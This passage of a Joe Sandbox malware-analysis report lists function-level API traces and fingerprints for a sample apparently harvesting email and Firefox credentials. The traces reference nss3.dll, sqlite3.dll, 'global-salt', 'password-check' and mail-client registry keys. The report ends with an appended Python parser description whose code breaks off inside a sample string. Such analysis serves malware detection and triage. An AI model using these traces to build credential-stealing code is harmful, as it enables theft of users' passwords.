  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
• strlen.MSVCRT ref: 004440D1
  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
• memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
• ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
• String ID:
• API String ID: 577244452-0
• Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
• Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
• Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
• Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
APIs
• memset.MSVCRT ref: 0040C02D
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2726666094-3614832568
• Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
• Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
• Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
• Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
• GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
• OpenClipboard.USER32(?), ref: 0040C1B1
• GetLastError.KERNEL32 ref: 0040C1CA
• DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
• Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
• Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
APIs
• memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
• memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
• memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
• memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: global-salt$password-check
• API String ID: 231171946-3927197501
• Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
• Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
• Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
APIs
  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
• memset.MSVCRT ref: 0040330B
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
• strchr.MSVCRT ref: 0040335A
  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
• strlen.MSVCRT ref: 0040339C
  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
• Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
• Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
• Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                            APIs
                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$_mbscpy
                                                                            • String ID: smtp
                                                                            • API String ID: 2625860049-60245459
                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                            APIs
                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                            • memset.MSVCRT ref: 00408258
                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                            Strings
                                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Close$EnumOpenmemset
                                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                                            • API String ID: 2255314230-2212045309
                                                                            • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                            • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C28C
                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessagePostmemset
                                                                            • String ID: S_@$l
                                                                            • API String ID: 3436799508-4018740455
                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004092C0
                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            Strings
                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                            • API String ID: 408644273-3424043681
                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                            APIs
                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 3492281209-168460110
                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_strcmpimemset
                                                                            • String ID: edit
                                                                            • API String ID: 275601554-2167791130
                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                            APIs
                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            • API String ID: 1860491036-0
                                                                            • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                            • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D2C2
                                                                            • memset.MSVCRT ref: 0040D2D8
                                                                            • memset.MSVCRT ref: 0040D2EA
                                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                            • memset.MSVCRT ref: 0040D319
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi
                                                                            • String ID: C@$mail.identity
                                                                            • API String ID: 1439213657-721921413
                                                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                            • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _ultoasprintf
                                                                            • String ID: %s %s %s
                                                                            • API String ID: 432394123-3850900253
                                                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                            APIs
                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                            • String ID: menu_%d
                                                                            • API String ID: 1129539653-2417748251
                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                            • String ID: sqlite3.dll
                                                                            • API String ID: 1983510840-1155512374
                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
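The records above are Joe Sandbox's per-function IDA-plugin output: each block lists the API calls the function makes (with "Part of subcall function" entries for calls made by its callees), the memory dump it was lifted from, and a Similarity section whose API String ID, Opcode ID and fuzzy hashes exist to match the same function across samples. What follows is an added example, not part of the Joe Sandbox report: a Python parser for this block layout that turns each record into a dict and adds two helpers a triager would want, the DLLs a function references (here sqlite3.dll and nss3.dll, the SQLite and Firefox NSS libraries that browser-credential recovery code loads) and the fingerprint pair used to find functions shared between two parsed reports. The parsing rules (the `$`-joined API ID, the `name.MODULE(args), ref: ADDR` call format, a record starting at `APIs` or at a `Strings` header that follows a completed record) are inferred from the visible layout and are assumptions, not a documented schema; the embedded sample text is copied from the records above, with the second record trimmed.

```python
"""Parse Joe Sandbox IDA-plugin function records (the 'APIs' / 'Memory Dump Source' /
'Similarity' blocks above) into dicts, so per-function fingerprints and the DLLs a
function references can be compared across reports. Added example; the parsing rules
are inferred from the visible layout, not from a documented Joe Sandbox schema."""
import re

# Constructed sample: two records copied from the report text above (second one trimmed).
SAMPLE = """APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
• Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
• Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
APIs
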